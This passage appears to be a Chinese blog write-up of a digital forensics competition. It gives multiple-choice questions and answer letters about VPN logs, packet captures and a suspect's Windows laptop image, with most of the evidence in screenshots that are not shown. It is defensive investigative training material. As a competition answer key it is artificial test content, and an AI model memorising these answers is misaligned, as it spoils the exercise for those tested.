class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215925090.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022215925090"></p><p>然后我们顺手打开配置文件: <img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024141837714.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024141837714.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024141837714"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142000609.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142000609.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024142000609"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142406156.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142406156.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024142406156"></p><p>然后再顺手看看<code>options</code>文件:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143552264.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143552264.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024143552264"></p><blockquote><ol start="61"><li><code>VPN</code> 软件记录了客户端使用的名称和密码,记录的文件是(<strong>C</strong>)</li></ol><p><code>A. /etc/l2tp/chap-secrets B. /etc/ipsec/pap-secrets C. /etc/ppp/chap-secrets D. /etc/ppp/pap-secrets</code></p></blockquote><p>四个选项的目录里面找一下~</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143827699.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143827699.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024143827699"></p><blockquote><ol start="52"><li><p>在服务器时间<code>2019-07-02_02:08:27</code>登陆过<code>VPN</code>客户端的用户名是哪个?(<strong>C</strong>)</p><p><code>A. root B. vpn1 C. vpn2 D. vpn3</code></p></li><li><p>上题用户登陆时的客户<code>IP</code>是什么?(<strong>A</strong>)</p><p><code>A. 192.168.184.133 B. 172.16.81.101 C. 192.168.184.134 D. 192.168.43.238</code></p></li><li><p>通过 <code>IP172.16.80.188 </code>登陆<code>VPN</code>服务器的用户名是哪个?(<strong>A</strong>)</p><p><code>A. root B. vpn1 C. vpn2 D. vpn3</code></p></li><li><p>上题用户登陆 <code>VPN </code>服务器的北京时间是(<strong>D</strong>)</p><p><code>A. 2019-07-11_10:46:50 B. 2019-07-11_11:30:36 C. 2019-07-13_14:15:37 D. 2019-07-13_16:15:37</code></p></li></ol></blockquote><p>查看日志文件: <img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025105736683.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025105736683.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025105736683"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025110410326.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025110410326.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025110410326"></p><p>前几题得知,服务器时间是<code>Asia/Dhaka</code>,比北京时间早<code>2h</code>,所以北京时间应该是<code>2019-07-13_16:15:37</code></p><blockquote><ol start="56"><li><p>该服务器曾被进行过抓包,请问 <code>network.cap </code>是对哪个网卡进行抓包获得的抓包文件?(<strong>B</strong>)</p><p><code>A.eth0 B.ens33 C.ens37 D.ens160</code></p></li><li><p>对 <code>ens37</code> 网卡进行抓包产生的抓包文件并保存下来的是哪个?(<strong>D</strong>)</p><p><code>A. network.cap B. network1.cap C. net0713.cap D. net0713-1.cap</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024163241247.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024163241247.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024163241247"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024164502919.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024164502919.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201024164502919"></p><blockquote><ol start="58"><li><p>从保存的数据包中分析可知,出口的 <code>IP</code> 为(<strong>A</strong>)</p><p><code>A. 172.16.80.92 B. 172.16.81.101 C. 172.16.81.188 D. 172.16.80.133</code></p></li></ol></blockquote><p>我们用<code>wireshark</code>打开<code>net0713.cap</code>文件跟踪<code>tcp</code>流,但是找不到<code>ABCD</code>任何一个选项……我们再打开<code>net0713-1.cap</code>数据包,找到答案:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025111547524.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025111547524.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025111547524"></p><p>但是为什么第一个数据包里面就没有答案呢???这是因为该<code>vpn</code>服务器为双网卡,对内IP为<code>192.168.184.133</code>,具备对检材1(<code>192.168.184.128</code>)和检材2(<code>192.168.184.129</code>)访问权限,出口/服务端IP为<code>172.16.80.92</code>。</p><h2 id="Part-4"><a href="#Part-4" class="headerlink" title="Part 4"></a>Part 4</h2><p>你抓获了嫌疑人,并扣押了嫌疑人笔记本电脑,制作笔记本硬盘镜像文件“检材 4.E01”,请根据镜像文件,回答下列问题:</p><blockquote><ol start="59"><li><p>计算“检材 4.E01”文件的 sha256 值(<strong>C</strong>)</p><p><code>A. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c5</code></p><p><code>B. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c6</code></p><p><code>C. e6e47e210bd56c7071ce73ab5523736120071d0f3da5335936d7beb25c3914cd</code></p><p><code>D. 1e646dec202c96b72f13cc3cf224148fc4e19d6faaaf76efffc31b1ca2cdd200</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113252486.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113252486.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025113252486"></p><blockquote><ol start="60"><li><p>请分析该检材的操作系统版本(<strong>A</strong>)</p><p><code>A. Windows 10 Education B. Windows 10 Home C. Windows 10 Pro D. Windows 10 Enterprise</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113321982.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113321982.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025113321982"></p><blockquote><ol start="61"><li><p>找出该系统用户最后一次登陆时间:(<strong>C</strong>)</p><p><code>A. 2019-07-14 10:50:02 B. 2019-07-14 10:10:02 C. 2019-07-14 10:40:02 D. 2019-07-14 10:30:02</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113143282.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113143282.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025113143282"></p><blockquote><ol start="62"><li><p>找出该系统最后一次正常关机时间:(<strong>C</strong>)</p><p><code>A. 2019-07-14 17:30:05 B. 2019-07-14 10:30:05 C. 2019-07-14 11:30:05 D. 2019-07-14 12:30:05</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114751529.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114751529.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025114751529"></p><blockquote><ol start="63"><li><p>请计算检材桌面上文本文件的 sha256 值:(<strong>A</strong>)</p><p><code>A. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c5</code></p><p><code>B. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c6</code></p><p><code>C. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c7</code></p><p><code>D. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c8</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114916816.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114916816.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025114916816"></p><blockquote><ol start="64"><li><p>该系统于 2019 年 7 月 13 日安装的软件为:(<strong>A</strong>)</p><p><code>A. Eraser B. Putty C. Xftp D. Xshell</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115104789.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115104789.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025115104789"></p><blockquote><ol start="65"><li><p>找出该嫌疑人于 2019-07-13 17:52:19 时,使用 WinRAR 工具访问了_____文件:(<strong>D</strong>)</p><p><code> A.navicat11.zip B. we.tar.gz C. test2-master.zip D. BitLocker.rar</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112091057054.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112091057054.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112091057054"></p><blockquote><ol start="66"><li><p>系统于 <code>2019-07-13 17:53:45 </code>时运行了___程序:(<strong>D</strong>)</p><p><code>A. regedit.exe B. WinRAR.exe C. Xshell.exe D. Foxmail.exe</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115848963.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115848963.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025115848963"></p><blockquote><ol start="67"><li><p>文件<code>test2-master.zip</code>是什么时间下载到本机的:(<strong>D</strong>)</p><p><code>A. 2019-07-13 14:21:01 B. 2019-07-13 17:22:01 C. 2019-07-13 15:23:01 D. 2019-07-13 16:20:01</code></p></li></ol></blockquote><p>下载文件一般都是默认储存在“下载”文件夹下:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120131866.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120131866.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025120131866"></p><blockquote><ol start="68"><li><p>文件 <code>test2-master.zip</code> 是使用什么工具下载到本地的:(<strong>A</strong>)</p><p><code>A. Chrome B. Internet Explorer C. edge D.迅雷</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120241300.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120241300.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201025120241300"></p><blockquote><ol start="69"><li><p>嫌疑人成功连接至 <code>192.168.184.128 </code>服务器的时间为:(<strong>A</strong>)</p><p><code>A. 2019-07-13 16:21:28 B. 2019-07-13 16:21:31 C. 2019-07-13 16:21:35 D. 2019-07-13 16:21:25</code></p></li></ol></blockquote><p>在取证大师里面查看上网记录:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106135548896.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106135548896.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201106135548896"></p><blockquote><ol start="70"><li><p>嫌疑人通过远程连接到 <code>128</code> 服务器,下载了什么文件到本机:(<strong>B</strong>)</p><p><code> A. web.tar.gz B. we.tar.gz C. home.tar.gz D. wwwroot.tar.gz</code></p></li><li><p>承接上一题,下载该文件用了多长时间:(<strong>C</strong>)</p><p><code> A.10 秒 B.20 秒 C.15 秒 D.25 秒</code></p></li><li><p>请计算该下载文件的 sha256 值:(<strong>D</strong>)</p><p><code> A. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d8</code></p><p><code> B. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d7</code></p><p> <code>C. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d6</code></p><p> <code>D. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d5</code></p></li></ol></blockquote><p>取证大师里面搜索关键字<code>.tar.gz</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106211846725.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106211846725.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201106211846725"></p><p>在检材四中找不到文件,又因为他是从<code>192.168.184.128</code>下载获取<code>we.tar.gz</code>,所以我们从检材一中找到文件,计算<code>SHA256</code>:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107112119784.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107112119784.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107112119784"></p><blockquote><ol start="73"><li><p>请分析并提取,嫌疑人所用的手机的<code>IMEI </code>号码:(<strong>C</strong>)</p><p><code> A. 352021062748965 B. 352021062748966 C. 352021062748967 D. 352021062748968</code></p></li></ol></blockquote><blockquote><p><strong>国际移动设备识别码</strong>(<strong>International Mobile Equipment Identity</strong>,<strong>IMEI</strong>),即通常所说的手机序列号、手机“串号”,用于在移动电话网络中识别每一部独立的手机等移动通信设备,相当于移动电话的身份证。</p></blockquote><p><img 